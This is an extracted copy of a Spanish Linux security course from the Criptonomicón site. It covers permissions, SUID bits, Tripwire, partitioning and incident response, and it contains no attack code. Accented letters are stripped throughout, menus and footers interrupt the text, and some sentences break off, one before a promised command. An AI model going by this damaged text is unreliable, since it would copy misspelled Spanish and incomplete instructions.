Navegacin segura
Direccin de correo
Control de acceso
Validar formularios
Cambiar imgenes
Enviar datos
dinmicamente
CGI
Clculos matemticos
Java
Cookies
JavaScript
La barra de estado
Cookies
Crashes
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Agujeros
Spam
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
.
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Introduccin
Seguridad Fsica
Seguridad Local
Seguridad del Sistema de
Archivos
Seguridad de Red
Qu significa Seguro?
Servicios en Linux
Por qu la Seguridad
Seguridad en el
desarrollo de Linux
Qu Quiere Proteger?
Qu hacer en caso de
Ruptura?
Recursos
principalmente sobre actividades que ya se han llevado a cabo, por lo que esperamos
que no sea el primero en sufrirlas. Pero tambin se puede encontrar informacin
sobre debilidades detectadas antes de que se lleven a cabo. Por todo esto, este curso
no pretende proporcionar una lista actualizada de programas o servicios
potencialmente inseguros o de programas que afectan a la seguridad (denominados
exploits). Como continuamente aparecen nuevos programas para comprometer la
seguridad de las redes y de las comunicaciones, lo que s haremos ser indicar los
lugares ms habituales donde buscar una informacin actualizada de ese tipo, y
algunos mtodos generales para prevenir que esos programas tengan xito en su
sistema.
Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Introduccin
Seguridad Fsica
Seguridad Local
Seguridad del Sistema de
Archivos
Seguridad de Red
Seguridad fsica
Las primeras medidas de seguridad que necesita tener en cuenta
son las de seguridad fsica de sus sistemas. Hay que tomar en
consideracin quines tienen acceso fsico a las mquinas y si
realmente deberan acceder.
Seguridad fsica
Seguridad en el
arranque
Bloqueo de la consola
Recursos
Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Introduccin
Seguridad Fsica
Seguridad Local
Seguridad del Sistema de
Archivos
Seguridad de Red
Introduccin
Linux es un sistema operativo multiusuario real: puede haber
varios usuarios trabajando simultneamente con l, cada uno en su
terminal. Esto obliga a tener en cuenta medidas de seguridad
adicionales. Adems, segn hablan las estadsticas, el mayor
porcentaje de violaciones de un sistema son realizadas por
usuarios locales. Pero no slo hay que protegerse de las
violaciones intencionadas, sino que el sistema debe protegernos de
operaciones accidentales debidas a decuidos o ignorancia de los
usuarios.
Introduccin
Cuentas de usuario,
grupos
Seguridad de las claves
El bit SUID/SGID
Seguridad del root
Ruptura?
Recursos
Por otro lado, la meta de la mayora de los ataques es conseguir acceso como root, lo
que garantiza un control total sobre el sistema. Primero se intentar conseguir acceso
como usuario "normal" para posteriormente ir incrementando sus niveles de
privilegio utilizando las posibles debilidades del sistema: programas con errores,
configuraciones deficientes de los servicios o el descifrado de claves cifradas.
Incluso se utilizan tcnicas denominadas "ingeniera social", consistentes en
convencer a ciertos usuarios para que suministren una informacin que debiera ser
mantenida en secreto, como sus nombres de usuario y contraseas.
En este apartado de seguridad local pretendemos dar unas ideas generales de los
riesgos existentes, mecanismos para su solucin y unas directrices de actuacin que
deberan convertirse en hbitos cotidianos.
Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Introduccin
Seguridad Fsica
Seguridad Local
Seguridad del Sistema de
Archivos
Seguridad de Red
Recursos
Introduccin
Una norma bsica de seguridad radica en la asignacin a cada
usuario slo de los permisos necesarios para poder cubrir las
necesidades de su trabajo sin poner en riesgo el trabajo de los
dems.
Como se puede poner en riesgo el correcto funcionamiento
del sistema?
Podemos apuntar algunas ideas: violando la privacidad de la
informacin, obteniendo unos privilegios que no le correspoden a
un usuario, haciendo un uso desmedido de los recursos o
modificando informacin legtima contenida en una mquina,
como pueden ser el contenido de una pgina web o una base de
datos.
Introduccin
El rbol de directorios
Permisos
Enlaces
Tripwire
Limitar el espacio
Normas prcticas
Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Introduccin
Seguridad Fsica
Seguridad Local
Seguridad del Sistema de
Archivos
Seguridad de Red
Recursos
Introduccin
Linux tiene la gran ventaja de tener disponible el cdigo fuente
del ncleo; en realidad Linux propiamente dicho es slo el ncleo.
Esto nos permite la posibilidad de crear ncleos a medida de
nuestras necesidades. Y parte de nuestras necesidades ser la
mejora de la seguridad.
Introduccin
Opciones de
compilacin
Dispositivos del ncleo
Para compilar el ncleo primero tendremos que configurar las opciones que nos
interesen. Los fuentes del ncleo se guardan habitualmente en el directorio
/usr/src/linux, y una vez situados en l, tendremos que ejecutar make menuconfig
(o make xconfig si estamos en modo grfico). As nos aparecen todas las opciones
de configuracin. Dentro de ellas nos vamos a fijar en las que estn relacionadas con
la seguridad, viendo una breve explicacin de lo que hacen y cmo se usan.
Como el ncleo controla las caractersticas de red de su sistema, es importante que el
ncleo tenga las opciones que garanticen la seguridad y que el propio ncleo no
pueda ser comprometido. Para prevenir algunos de los ltimos ataques de red, debe
intentar mantener una versin del ncleo actualizada. Puede encontrar las nuevas
versiones del ncleo en The Linux Kernel Archives.
Una de las caractersticas ms interesantes del ncleo Linux es la posibilidad de
realizar enmascaramiento de direcciones. Con esta tcnica podremos dar acceso a
Internet a una red local con direcciones privadas de forma transparente, es decir, sin
ningn tipo de modificacin en la configuracin de las aplicaciones clientes, a
diferencia de los proxies clsicos. Consiste en que el sistema Linux que posee la
conexin hacia el exterior recibe las peticiones de conexin desde los equipos de la
red local que tienen direcciones no vlidas para Internet. El equipo Linux rehace la
peticin poniendo su propia direccin IP y modificando el puerto al que tiene que
responder el equipo remoto. Cuando Linux recibe la respuesta del equipo remoto,
mira el puerto al que va destinado y vuelve a rehacer el paquete para enviarlo al
equipo concreto de la red local que solicit la conexin. De esta forma podemos
mantener un nivel aceptable de proteccin para los equipos de la red local, ya que
slo podrn recibir respuestas a peticiones que ellos mismos originaron.
Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
Introduccin
Seguridad Fsica
Seguridad Local
Seguridad del Sistema de
Archivos
Seguridad de Red
Introduccin
La seguridad de las conexiones en red merecen en la actualidad
una atencin especial, incluso por medios de comunicacin no
especializados, por el impacto que representan los fallos ante la
opinin pblica.
El propio desarrollo tanto de Linux, como de la mayora del
software que lo acompaa, es de fuentes abiertas. Podemos ver y
estudiar el cdigo. Esto tiene la ventaja de que la seguridad en
Linux no sea una mera apariencia, sino que el cdigo est siendo
escrutado por muchas personas distintas que rpidamente detectan
los fallos y los corrigen con una velocidad asombrosa.
Introduccin
inetd
tcp wrapper
Incidencias
Comunicaciones
seguras
Consejos finales
Preparacin para la
Seguridad
Qu hacer en caso de
Ruptura?
Recursos
Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Introduccin
Seguridad Fsica
Seguridad Local
Seguridad del Sistema de
Archivos
Seguridad de Red
Recursos
Introduccin
Introduccin
A menudo, el mayor enemigo del sistema es el propio
administrador del sistema, s, tiene todos los privilegios y
Hbitos seguros
cualquier accin puede ser irreversible y hacerle perder
posteriormente mucho ms tiempo que el que hubiera perdido por
Consejos
realizar las tareas de forma segura. Puede borrar cualquier fichero
e incluso destruir el propio sistema, mientras que un usuario normal slo puede
perjudicarse a s mismo. Por estos motivos, conseguir privilegios de root es la meta
de cualquier ataque.
Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Introduccin
Seguridad Fsica
Seguridad Local
Seguridad de Red
Recursos
Software actualizado
La gran mayora del sofware que acompaa a Linux es de cdigo fuente pblico,
como el propio ncleo. Esto es una garanta de seguridad en s. Cientos de expertos
analizan minuciosamente el cdigo para detectar alguna pega que poder publicar en
las listas de correo sobre seguridad ms prestigiosas, y se corrigen con gran rapidez.
De esta forma nos garantizamos un software de calidad y no una mera seguridad
aparente. Esto por otro lado nos obliga a ir sustituyendo las versiones defectuosas por
otras corregidas y que mejoran las prestaciones. En cualquier sistema operativo,
mantener un software que ha demostrado tener fallos supone asumir un riesgo
innecesario.
Para estar actualizado consulte los recursos de informacin sobre seguridad en Linux.
Secuencia de Copias
Es necesario tener un poltica de copias de seguridad adecuada a las caractersticas de
la entidad que estamos gestionando. Quizs el mejor mtodo es el de rotacin de
cintas. Pasamos a verlo con un ejemplo.
Un ciclo de seis cintas es fcil de mantener. Esto incluye cuatro cintas para la
semana, una cinta para cada Viernes y una cinta para para los Viernes impares. Se
realiza una copia incremental cada da, y una copia completa en la cinta adecuada de
cada Viernes. Si hace algn cambio importante o aade datos importantes a su
sistema tambin sera adecuado efectuar una copia.
Consejos
En resumen
Ahora, una vez vistas las caractersticas generales de seguridad, lo que queda es
aplicar el sentido comn. Tenemos que ver nuestra situacin y respondernos a una
serie de preguntas:
Qu queremos proteger?
Qu valor tiene lo que queremos proteger?
Qu coste tiene la seguridad?
De quin nos queremos proteger?
Cules son los puntos dbiles de nuestro sistema?
Las posibles respuestas a estas preguntas nos propocionan un abanico de
posibilidades demasiado amplio como para poderlo tratar todo.
Lo primero que tenemos que determinar es lo que queremos proteger. No ser lo
mismo una estacin de trabajo personal aislada con conexiones a Internet espordicas
que un servidor web con conexin permanente o un cortafuegos.
Tambin tendremos que considerar el coste de lo que queremos proteger: posible
coste econmico, tiempo de restauracin o instalacin, prestigio, perdida de clientes,
etc. Tambin el coste de la seguridad en unos trminos parecidos a los anteriores.
Sera absurdo que invirtiramos ms en proteccin que el coste de lo protegido.
Tambin hay que considerar que existe una relacin inversa entre seguridad y
funcionalidad. Cuanto ms seguro hacemos un sistema, menos funcional resulta,
ofreciendo menos servicios y ms limitaciones de acceso. Esto tambin constituye
otro coste adicional: facilidad de uso.
Despus de saber qu y de qu tenemos que protegernos, de quines y cules son sus
posibles objetivos, y viendo los servicios que necesariamente hay que prestar o usar,
obtendremos un esquema elemental de nuestra situacin y de las medidas que
tenemos que tomar.
Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Introduccin
Seguridad Fsica
Ahora vamos a ver qu se puede hacer en caso de haber sufrido o estar sufriendo un
ataque.
Seguridad Local
Seguridad del Sistema de
Archivos
Seguridad de Red
Recursos
Ataque local
Cuando detectamos un ataque local tendremos que verificar la identidad del atacante.
No conviene sacar conclusiones precipitadas y culpar a alguien de atacar el sistema
cuando slo puede que sea una negligencia a la hora de seleccionar una clave o
abandonar abierta una consola.
Hay que verificar el origen de la conexin, los registros del sistema y los procesos
que tiene activos. Tendremos que comprobar si son los habituales y qu es lo que se
sale de lo normal. Despus nos dirigiremos a esa persona, por telfono o
personalmente, para preguntar qu est haciendo y pedir que cese en la actividad. Si
no tiene una conexin activa y no tiene idea de lo que le estamos diciendo, habr que
profundizar en la investigacin porque cabe la posibilidad de que alguien haya
utilizado esa cuenta de forma ilegtima. Si reconoce el incidente, que le informe de
los mecanismos que ha utilizado, las acciones que ha realizado y acte en
consecuencia.
Nunca se precipite para hacer acusaciones. Recopile todas las pruebas que haya
file:///C|/TEMP/criptonomicon/criptonomicon/linux/ruptura.html (1 of 4) [25/10/2000 02:34:28 p.m.]
Ataque en red
Si el ataque se produce a travs de la red podemos tener distintas situaciones. En
general puede ser conveniente espiar un poco al intruso para obtener ms pruebas y
despus desconectar el interfaz de red si es posible. Si no fuera posible desconectar el
interfaz, deberamos usar algn filtro para las conexiones procedentes de la direccin
del atacante. Programas como ipchains (o ipfwadm en su caso) pueden realizar esta
labor. Si desconectamos el interfaz o denegamos (no rechazar) los paquetes
procedentes de esa direccin el intruso lo podra interpretar como un error de red,
ms que una deteccin del ataque. Si no se pudiera limitar el acceso a las direcciones
que usa el intruso, intente cerrar la cuenta del usuario. Observe que cerrar una cuenta
no es una cosa simple. Tiene que tener en cuenta los ficheros .rhosts, el acceso FTP y
otras posibles puertas traseras.
En general no es aconsejable apagar el sistema. Por supuesto, nunca apagarlo en
caliente; esto podra hacernos perder la informacin que tenemos en memoria. En
Linux podemos ver la lista de procesos que hay en ejecucin y matar aquellos que
puedan estar daando al sistema.
Somos el destino del ataque o somos un punto intermedio?
Se puede dar la situacin que nuestra mquina no sea el destino final del ataque.
Puede que el intruso la haya utilizado como punto intermedio para atacar a otros
sistemas e intentar dificultar el seguimiento de las pistas. En este caso, adems de
limitar las acciones del atacante deberamos notificarlo al administrador del destino
del ataque y conservar todas las pruebas existentes por si se pudieran reclamar
judicialmente.
En cualquier caso, si queremos dar validez legal a las pruebas obtenidas, sera
conveniente la intervencin judicial.
Es habitual que durante los prximos minutos el atacante vuelva a intentar continuar
con sus acciones, tal vez usando una cuenta diferente y/o una direccin de red
distinta.
El ataque ha concluido
Ha detectado un compromiso que ya ha ocurrido o bien lo ha detectado mientras
ocurra y ha echado al atacante fuera de su sistema.
Ahora viene la parte ms dura del incidente: tratar de dejar el sistema mejor que
estaba antes de que ocurriera.
Tapar el agujero
Determine los medios que us el atacante para acceder a su sistema. Deber analizar
cuidadosamente los ficheros de registro del sistema. En ellos debera haber una
informacin valiosa para seguir la pista de las actividades del intruso en nuestra
mquina. Las causas ms habituales son una mala configuracin de algn servicio,
un programa defectuoso o la negligencia de algn usuario con respecto a su clave de
acceso.
Compruebe por los cauces ms conocidos, que se pueden consultar en la pgina
sobre recursos de seguridad bajo Linux, la existencia de algn nuevo exploit que
pueda ser la causa u otros fallos que tenga que corregir.
Si no elimina al atacante, probablemente volver. No slo a su mquina, sino a
cualquiera otra de la red. Durante sus incursiones ha podido utilizar algn sniffer,
y disponer de informacin suficiente para tener acceso a otras mquinas locales.
Si sospecha que el atacante ha obtenido copias de los ficheros /etc/passwd,
/etc/shadow, /etc/ppp/pap-secrets, /etc/ppp/chap-secrets o cualquier otro fichero que
contenga datos de usuarios y claves, sera conveniente modificarlas todas. Si tiene
distintos usuarios en su mquna, oblgueles a cambir su clave. En general es
preferible cambiar siempre las claves despues de un incidente, una vez que sepamos
que lo hacemos de una forma segura.
Verifique si se han modificado las limitaciones al acceso a distintas herramientas de
administracin remota como linuxconf. Puede que el atacante trate de abrir alguna
puerta trasera para continuar aprovechndose de nuestras mquinas.
En algunos casos puede interesar antes de nada, hacer alguna copia de todo el disco
duro para seguir investigando el incidente en otra mquina distinta que no est
conectada a la red y no perder una informacin que puede ser valiosa.
Avisar
Si cree que ha sido objeto de un ataque que no est documentado, debera notificarlo
a alguna organizacin de seguridad como CERT o similar para que se pueda
solucionar lo antes posible y evitar que otros sistemas lo puedan padecer.
Y aunque sea un hecho documentado con anterioridad, no dude en pedir consulta a
alguna de la mltiples lista de correo que tratan temas de seguridad en general y de
Linux en particular. En Espaa resulta especialmente recomendada la lista
CERT-ES de RedIris.
Si ha conseguido informacin sobre el atacante, se lo debera notificar al
administrador del dominio del intruso. Puede buscar este contacto con whois, con la
base de datos del Internic o en RedIris. Podra enviarles un mensaje de correo con
todos los registros relacionados con el incidente, fechas y horas. Si conoce alguna
otra informacin sobre su intruso, podra mencionarla tambin. En ciertas
situaciones, tras enviar el correo podra llamar por telfono al administrador del
sistema que origin el incidente. Si el admininistrador localiza a su atacante, podra
hacerle las cosas mucho ms fciles.
Los buenos hackers con frecuencia usan sistemas intermedios. Algunos (o muchos)
puede que ni sepan que han sido comprometidos. Intentar seguir la pista de un
cracker hasta su origen puede ser difcil. Siendo educado con los administradores, le
puede facilitar la obtencin de la ayuda necesaria.
De todas formas, esperamos que la lectura de este captulo sea totalmente
innecesaria, si ha seguido unas normas adecuadas de seguridad.
Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Introduccin
Seguridad Fsica
Seguridad Local
Seguridad del Sistema de
Con esta lista de recursos perseguimos dos objetivos fundamentales, tener una buena
gua para saber dnde consultar y obtener informacin, y por otro lado, obtener la
informacin sobre las novedades que van ocurriendo, nuevos fallos descubiertos, los
exploits que aparecen y los mecanismos para poderlos solucionar.
En SeguriNet se puede encontrar una traduccin en castellano de la Gua de
Seguridad del Administrador de Linux. En ella tenemos una documentacin valiosa
donde completar aspectos ms concretos, as como una buena lista de recursos.
Archivos
Seguridad de Red
Por otro lado en CICA tenemos la mejor lista de correo sobre seguridad en castellano
que hay sobre linux. No es un foro de discusin, no est pensada para realizar
consultas, sino para recibir de forma rpida y clara todos los avisos sobre nuevas
vulnerabilidades que se detectan en Linux, los efectos que pueden tener y cmo se
pueden solucionar. No queremos desaprovechar la oportunidad de agradecerles el
trabajo que realizan. Podis suscribiros en su pgina de suscripcin a
sec-linux@ls.cica.es. CICA cuenta adems con otra informacin interesante que
merece la pena consultar.
Seguridad
Qu hacer en caso de
En las pginas del GLUB hay una buena recopilacin de software y documentacin
de seguridad en Linux en castellano.
Ruptura?
Recursos
RedIris es otro lugar que tambin dispone de informacin valiosa y listas sobre
seguridad y Linux.
Caldera OpenLinux
RedHat
SuSE
Debian
Slackware
Frum Slackware
TurboLinux
Stampede GNU/Linux
Mandrake
LinuxPPC
Linux Pro
LinuxWare
MKLinux
Yggdrasil
Connectiva
DLD
Eurielec
Kheops Linux
MNIS Linux
nmap
ftpcheck, relaycheck
cheops
nessus
saint
SBScan
HUNT
Administracin
rpm
Logcheck
bgcheck
COAS
Webmin
Linuxconf
super
YaST
Cortafuegos
ipchains y otros
Servicios de Red
sendmail
apache
BIND/DHCPD/DHCPCD
secure syslog
openssl
ncftp, ncdftp
qmail
postfix
ProFTPD
rsync
PPP
Servicios de internet
CIPE
ECLiPt
SSL
SSLeay
Ftp oficial
Servicios/Cifrado de datos
CFS
Herramientas de Seguridad
audit
Kernel
stackguard
Deteccin de intrusos
port sentry
host sentry
USA - CERT
INTERNATIONAL - HERT
AUSTRALIA - AUSCERT
SINGAPORE - SINGCERT
L0pht
Root Shell
Infowar UK
buenos documentos
BRU
Quickstart
Arkeia
CTAR
CTAR:NET
Backup Professional
Aplicaciones
Varios
Wietse's
Ftp de ES-CERT
The Hacker FA
Bugtraq
First
Hacking
CPSR
Underground
Defcon
Listas de correo
Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Introduccin
Seguridad Fsica
Seguridad Local
Seguridad del Sistema de
Archivos
Seguridad de Red
Recursos
Introduccin
El rbol de directorios
Permisos
Enlaces
Tripwire
Limitar el espacio
Normas prcticas
Incluso puede aadir una entrada a crontab para ejecutar tripwire desde su disquete
todas las noches y enviar por correo los resultados y verlos por la maana, algo como
esto:
MAILTO=gonzalo
15 05 * * * root /usr/local/bin/tripwire
que le enviar por correo un informe cada maana a las 5:15 am.
Tripwire puede ser una de la mejores herramientas para detectar intrusos antes de que
tenga otro tipo de noticias de ellos. Como son muchos los ficheros que se modifican
en su sistema, debera tener cuidado para discernir lo que es la actividad de un
cracker y lo que es la activiadad normal del sistema.
Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Introduccin
Seguridad Fsica
Seguridad Local
Seguridad del Sistema de
Archivos
Seguridad de Red
Recursos
El rbol de directorios
Para quienes no estn familiarizados con las caractersticas del
sistema de almacenamiento de informacin en sistemas Unix, hay
que indicar que se organizan en un nico rbol de directorios.
Cada soporte, disco, particin, disquete o CD tiene su propia
organizacin lgica, un sistema de ficheros. Para poder usar uno
de estos soportes tenemos que "montarlo" en un directorio
existente. El contenido de la particin nos aparecer como el
contenido del directorio.
Introduccin
El rbol de directorios
Permisos
Enlaces
Tripwire
Limitar el espacio
Un primer criterio para mantener un sistema seguro sera hacer
una correcta distribucin del espacio de almacenamiento. Esto
Normas prcticas
limita el riesgo de que el deterioro de una particin afecte a todo
el sistema. La prdida se limitara al contenido de esa particin.
No hay unas normas generales aplicables; el uso al que vaya destinado el sistema y la
experiencia son las bases de la decisin adecuada, aunque s podemos dar algn
consejo:
Si el sistema va a dar servicio a mltiples usuarios que requieren
almacenamiento para sus datos privados, sera conveniente que el directorio
/home tuviera su propia particin.
Si el equipo va a ser un servidor de correo, impresin, etc., el directorio /var
o incluso /var/spool podran tener su propia particin.
Algunos directorios son necesarios en la particin raz. Contienen datos que
son necesarios durante el proceso de arranque del sistema. Son /dev/, /etc,
/bin, /sbin, /lib, /boot.
El directorio /usr/local contiene los programas compilados e instalados
por el administrador. Resulta conveniente usar una particin propia para
proteger estos programas personalizados de futuras actualizaciones del
sistema. Este criterio tambin se puede aplicar al directorio /opt.
Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Introduccin
Seguridad Fsica
Seguridad Local
Seguridad del Sistema de
Archivos
Seguridad de Red
Recursos
Permisos
Linux, como sistema multiusuario, asigna un propietario y un
grupo a cada fichero (y directorio) y unos permisos al propietario,
al grupo y al resto de los usuarios. La forma ms rpida de
comprobar esta caracterstica es usar el comando ls -la. As
nos aparece el tipo de fichero, el propietario, el grupo, los
permisos e informacin adicional. Por supuesto, el sistema de
ficheros tiene que admitir esta caracterstica, como es el caso del
sistema de ficheros ext2 (Linux nativo). En los sistemas de
ficheros pensados para entornos monousario, como msdos o vfat,
no tenemos esta caracterstica, por lo que son inseguros y su uso
no es aconsejable bajo Linux.
Introduccin
El rbol de directorios
Permisos
Enlaces
Tripwire
Limitar el espacio
Normas prcticas
ficheros que son de su propiedad o para los que tiene permiso explcito de
escritura, incluso cuando tiene acceso de escritura al directorio. Esto est
pensado para directorios como /tmp, que tienen permiso de escritura global,
pero no es deseable permitir a cualquier usuario borrar los ficheros que quiera.
El sticky bit aparece como 't' en los listados largos de directorios.
drwxrwxrwt 19 root root 8192 Jun 24 14:40
tmp
Attributo SUID: (Para Ficheros)
Este bit describe permisos al identificador de usuario del fichero. Cuando el
modo de acceso de ID de usuario est activo en los permisos del propietario, y
ese fichero es ejecutable, los procesos que lo ejecutan obtienen acceso a los
recursos del sistema basados en el usuario que crea el proceso (no el usuario
que lo lanza). Por ejemplo /usr/bin/passwd es un ejecutable propiedad de root
y con el bit SUID activo. Por qu? Este programa lo puede usar cualquier
usuario para modificar su clave de acceso, que se almacena en
-rw-r--r-- 1 root root 1265 Jun 22 17:35 /etc/passwd
pero segn los permisos que observamos en este fichero, slo root puede escribir y
modificar en l. Entonces sera imposible que un usuario pudiera cambiar su clave si
no puede modificar este fichero. La solucin para este problema consiste en activar el
bit SUID para este fichero:
-r-s--x--x 1 root root 10704 Apr 14 23:21 /usr/bin/passwd
de forma que cuando se ejecute, el proceso generado por l es un proceso propiedad
de root con todos los privilegios que ello acarrea.
Piensa que esto puede ser un riesgo para la seguridad? Efectivamente lo podra ser
si no mantenemos un mnimo de atencin, ya que en este tipo de programas se
pueden producir desbordamientos de bfer que comprometan su sistema. Recuerde
siempre lo siguiente:
No asignar el bit SUID salvo cuando sea estrictamente necesario.
Comprobar que cualquier programa con est bit activo no tiene ningn
desbordamiento de buffer (conocido).
No asignarlo jams si el programa permite salir a la shell.
Atributo SGID: (Para ficheros)
Si est activo en los permisos de grupo, este bit controla el estado de "poner id
de grupo" de un fichero. Acta de la misma forma que SUID, salvo que afecta
al grupo. El fichero tiene que ser ejecutable para que esto tenga algn efecto.
Atributo SGID: (Para directorios)
Si activa el bit SGID en un directorio ( con "chmod g+s directorio"), los
ficheros creados en ese directorio tendrn puesto su grupo como el grupo del
directorio.
Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Introduccin
Seguridad Fsica
Seguridad Local
Seguridad del Sistema de
Archivos
Enlaces
Los sistemas de ficheros de tipo Unix permiten crear enlaces entre
ficheros. Los enlaces pueden ser duros o simblicos.
Introduccin
El rbol de directorios
Seguridad de Red
Permisos
Enlaces
Tripwire
Limitar el espacio
Normas prcticas
Qu hacer en caso de
Ruptura?
Recursos
Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Introduccin
Seguridad Fsica
Seguridad Local
Seguridad del Sistema de
Archivos
Seguridad de Red
Recursos
Introduccin
El rbol de directorios
Permisos
Enlaces
Tripwire
Limitar el espacio
Normas prcticas
Introduccin
Seguridad Fsica
Seguridad Local
Seguridad del Sistema de
Archivos
Seguridad de Red
Introduccin
El rbol de directorios
Permisos
Enlaces
Preparacin para la
Seguridad
Qu hacer en caso de
Ruptura?
Recursos
Los ficheros sin propietario tambin pueden ser un indicio de que un intruso ha
accedido a su sistema. Puede localizar los ficheros de su sistema que no tienen
propietario o que no pertenecen a un grupo con el comando:
Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Introduccin
Seguridad Fsica
Seguridad Local
Seguridad del Sistema de
Archivos
Seguridad de Red
Introduccin
Cuentas de usuario,
grupos
Seguridad de las claves
El bit SUID/SGID
Preparacin para la
Seguridad
Qu hacer en caso de
Ruptura?
Recursos
Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Introduccin
Seguridad Fsica
Seguridad Local
Seguridad del Sistema de
Archivos
Seguridad de Red
Introduccin
Cuentas de usuario,
grupos
Seguridad de las claves
El bit SUID/SGID
Seguridad del root
Ruptura?
Recursos
Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Introduccin
Seguridad Fsica
Seguridad Local
Seguridad del Sistema de
Archivos
